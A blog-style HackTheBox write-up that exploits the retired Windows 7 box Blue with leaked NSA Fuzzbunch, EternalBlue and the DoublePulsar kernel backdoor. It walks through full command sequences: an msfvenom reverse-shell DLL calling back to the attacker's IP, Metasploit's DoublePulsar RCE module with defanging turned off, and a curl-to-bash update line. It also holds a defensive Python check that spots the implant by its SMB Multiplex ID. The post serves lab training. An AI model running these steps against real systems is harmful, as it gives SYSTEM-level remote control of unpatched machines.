HacktheBox | Blue | Fuzzbunch + DoublePulsar

This post is a thinly veiled excuse to get some Fuzzbunch content out there for people who’ve never used the tool, but wanted a thinly veiled excuse and a good target. I’m also posting this because William Vu recently wrote a few fantastic blog posts about the research behind his team’s new Metasploit module for DoublePulsar RCE on both SMB and RDP. Check out William’s Open-Source Command and Control of the DOUBLEPULSAR Implant for relevant reading and get some priceless insight into his approach.

If you’ve found this post but are fuzzy on the backstory Wikipedia has a great entry. TLDR: NSA cyber weapons, ransomware, everyone patched.

Disclaimer: Use Fuzzbunch at your own risk. Never run Fuzzbunch anywhere other than a lab environment, on VMs which you will revert/trash afterwards. Don’t do bad things to people who don’t patch, etc.

We’ll start by installing Wine + Fuzzbunch on an up-to-date Kali VM, then use it to attack HacktheBox’s retired box Blue using the EternalBlue plugin, implant DoublePulsar, then execute commands via Fuzzbunch and Metasploit’s DoublePulsar RCE module (exploit/windows/smb/smb_doublepulsar_rce). Yes, you need a HacktheBox VIP membership to access Blue, yes it’s 100% worth it, and yes you can follow along on an unlicensed copy of Windows 7 x64 that isn’t patched for EternalBlue (MS17-010).

What is DoublePulsar?

DoublePulsar is a Windows backdoor developed by the US government which runs in kernel mode and gives attackers on the local network RCE as SYSTEM. You can test for it using its Ping function and remotely uninstall it to remove the IOC. It’s pretty awesome, and we’re going to infect a computer with it.

Installing Fuzzbunch

These installation steps are 100% taken from mdiazcl’s GitHub. See mdiazcl’s repo for a more thorough breakdown of the process, as I’m going to gloss over and combine steps into big blocks of commands for easy copy/paste into a terminal.

These commands set up Wine and Wine 32, configure the terminal, initialize the Wine environment, and open up a regedit.exe window.

apt update && apt install -qy wine winbind winetricks \
&& dpkg --add-architecture i386 && apt-get update \
&& apt-get install -qy wine32 \
&& WINEPREFIX="$HOME/.wine-fuzzbunch" WINEARCH=win32 wine wineboot \
&& export WINEPREFIX=$HOME/.wine-fuzzbunch \
&& wine regedit.exe

In regedit, go to HKEY_CURRENT_USER > Environment, right click > New > String Value. Enter PATH as the name, then double click on PATH and set Value data to:

c:\windows;c:\windows\system;C:\Python26;C:\fuzzbunch-debian\windows\fuzzbunch

Click OK, close regedit.exe.

Clone the Fuzzbunch repo, install Python 2.6, and launch the Wine environment. Click Next on any Python installer popups.

cd $HOME/.wine-fuzzbunch/drive_c \
&& git clone https://github.com/mdiazcl/fuzzbunch-debian.git \
&& winetricks python26 && cd $HOME/.wine-fuzzbunch/drive_c/fuzzbunch-debian/windows \
&& wine cmd.exe

Running EternalBlue and Implanting DoublePulsar

Launch Fuzzbunch in the Wine environment created in the previous step:

python fb.py

Most values can be left as default. Here’s what I used for Blue:

  • Default Target IP Address: 10.10.10.40
  • Default Callback IP Address: <YOUR IP GOES HERE>
  • Use Redirection: no
  • Base Log directory: <Default>
  • Project: 0
  • New Project Name: TestingDoublePulsar
  • Set target log directory to: <Default>

Next, load and configure the EternalBlue plugin with the use command.

use EternalBlue

Leave all options as Default, except:

  • Mode: 1

Hit Enter to execute. Your log should look something like this:

Reading through the log, you can see some parts are familiar from Metasploit’s EternalBlue module. You can also see that DoublePulsar was confirmed to have worked via a Ping test.

Verifying the DoublePulsar Implant

Invoke use to load the DoublePulsar plugin and double-check that the implant worked.

use DoublePulsar

Leave all the values as default except:

  • Architecture: 1
  • Function: 1

Set the remaining options to Default, then hit Enter to execute the plugin.

Alternatively you can load msfconsole and use the DoublePulsar detection module:

use auxiliary/scanner/smb/smb_ms17_010
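Both checks above rely on the same signature. The scanner sends a Trans2 SESSION_SETUP probe with Multiplex ID 0x41; a clean host echoes 0x41 back in its (STATUS_NOT_IMPLEMENTED) reply, while a host running the DoublePulsar SMB implant answers with Multiplex ID 0x51. The following is an added example, not code from the original post or from Metasploit: a small Python parser that decodes the NetBIOS and SMB1 headers of a probe reply and applies that Multiplex ID check. The reply bytes are constructed in the script (flags, PID and UID values are arbitrary sample values) so it runs offline; on a real capture you would feed it the raw bytes of the Trans2 response instead.

```python
import struct

# Added detection example (not from the original post). It applies the check the
# Metasploit smb_ms17_010 scanner and Fuzzbunch's Ping function rely on: the
# Trans2 probe carries Multiplex ID 0x41, and a DoublePulsar-implanted host
# answers with Multiplex ID 0x51, while a clean host echoes 0x41 back.

SMB_MAGIC = b"\xffSMB"
SMB_COM_TRANSACTION2 = 0x32
STATUS_NOT_IMPLEMENTED = 0xC0000002
MID_PROBE = 0x41          # MID the scanner puts in its Trans2 probe
MID_DOUBLEPULSAR = 0x51   # MID the implant answers with (0x41 + 0x10)

# SMB1 header (32 bytes): magic, command, status, flags, flags2, pid_high,
# security_features, reserved, tid, pid_low, uid, mid
SMB1_HEADER = struct.Struct("<4sBIBHH8sHHHHH")
SMB1_HEADER_FIELDS = ("magic", "command", "status", "flags", "flags2", "pid_high",
                      "security_features", "reserved", "tid", "pid_low", "uid", "mid")


def parse_smb1(packet):
    """Strip the 4-byte NetBIOS session header and decode the SMB1 header."""
    if len(packet) < 4 + SMB1_HEADER.size:
        raise ValueError("packet too short for NetBIOS + SMB1 header")
    nb_type = packet[0]
    nb_length = int.from_bytes(packet[1:4], "big")   # 3-byte big-endian length
    if nb_type != 0x00 or nb_length != len(packet) - 4:
        raise ValueError("bad NetBIOS session header")
    fields = SMB1_HEADER.unpack(packet[4:4 + SMB1_HEADER.size])
    header = dict(zip(SMB1_HEADER_FIELDS, fields))
    if header["magic"] != SMB_MAGIC:
        raise ValueError("not an SMB1 packet")
    return header


def classify_probe_response(packet):
    """Return 'doublepulsar', 'clean' or 'unexpected' for a reply to the Trans2 probe."""
    header = parse_smb1(packet)
    if header["command"] != SMB_COM_TRANSACTION2:
        return "unexpected"
    if header["mid"] == MID_DOUBLEPULSAR:
        return "doublepulsar"
    if header["mid"] == MID_PROBE:
        return "clean"
    return "unexpected"


def build_sample_response(mid, status=STATUS_NOT_IMPLEMENTED):
    """Construct a minimal Trans2 error reply for testing (sample data, not a capture)."""
    header = SMB1_HEADER.pack(SMB_MAGIC, SMB_COM_TRANSACTION2, status,
                              0x98, 0xC807, 0, b"\x00" * 8, 0,
                              0x0800, 0xFEFF, 0x0800, mid)
    body = b"\x00" + b"\x00\x00"   # WordCount 0, ByteCount 0
    payload = header + body
    return b"\x00" + len(payload).to_bytes(3, "big") + payload


# Constructed sample replies: what a clean unpatched host and an implanted host
# would send back to the same probe.
CLEAN_REPLY = build_sample_response(MID_PROBE)
IMPLANTED_REPLY = build_sample_response(MID_DOUBLEPULSAR)

if __name__ == "__main__":
    for name, reply in (("clean host", CLEAN_REPLY), ("implanted host", IMPLANTED_REPLY)):
        mid = parse_smb1(reply)["mid"]
        print(f"{name}: MID=0x{mid:02x} -> {classify_probe_response(reply)}")
```

The Multiplex ID is the only field that differs between the two sample replies, which is why the check is cheap enough to run across a whole subnet, and why the same signature shows up in network IDS rules for this implant.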

Popping Shells

First we’ll use Fuzzbunch’s DLL Injection module with DoublePulsar to get a reverse shell, then we’ll try it again with the cool new Metasploit module.

Use msfvenom to generate a DLL with a basic reverse shell and place it in the root of the Wine environment (~/.wine-fuzzbunch/drive_c).

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR IP GOES HERE> LPORT=443 -f dll -o runme.dll \
&& mv runme.dll ~/.wine-fuzzbunch/drive_c

Back in Fuzzbunch, reload DoublePulsar.

use DoublePulsar

Use the same default values as earlier, except set Function to 2 for DLL Injection, and specify the path to the payload:

  • Function: 2
  • DllPayload: C:\runme.dll

Leave the rest as Default, create a netcat listener to catch the reverse shell, and execute the plugin.

Boom!

Metasploit’s DoublePulsar SMB RCE

Metasploit’s DoublePulsar RCE module is new, so if you’re on an old version of metasploit-framework, update with this one-liner.

curl -sL https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb | bash

After updating Metasploit, run msfconsole, then load the module:

use exploit/windows/smb/smb_doublepulsar_rce

Note: if the DoublePulsar module is not found after updating msf, exit msfconsole and reinitialize the database with msfdb init.

Now set options and execute. You must set DefangedMode to False to execute the payload.

set LHOST tun0
set LPORT 443
set RHOSTS 10.10.10.40
set DefangedMode False
run

Disabling the Implant

The makers of DoublePulsar also included the ability to remove the implant remotely, so let’s use it to clean up. From msfconsole, load the DoublePulsar SMB RCE module if it’s not already loaded.

use exploit/windows/smb/smb_doublepulsar_rce

Set the options; don’t forget DefangedMode.

set RHOSTS 10.10.10.40
set target 1
set DefangedMode False
run

Now run it.

Reload Metasploit’s DoublePulsar scanner from earlier and scan Blue. No more backdoor.

Conclusion

That’s how the pros do it. RCE to SYSTEM with a backdoor and fancy interface that anyone could use. Hopefully next time the NSA is more careful about who gets to play with their toys. Until then we’ll have our own toys like Metasploit, and devs like William Vu and his coworkers at Rapid7 adding useful modules to keep Blue Teams busy.

OSCE | OSCP | I like computers